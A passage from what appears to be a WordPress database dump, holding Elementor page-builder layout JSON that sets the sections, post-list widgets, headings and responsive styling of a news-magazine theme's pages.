\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1260,451,'_elementor_version','0.4'),(1261,451,'_elementor_css','a:3:{s:4:\"time\";i:1508891385;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1263,452,'_elementor_edit_mode','builder'),(1264,452,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"40